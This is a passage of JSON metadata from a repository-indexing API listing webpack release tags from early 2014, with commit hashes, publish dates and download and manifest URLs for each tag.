:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/ap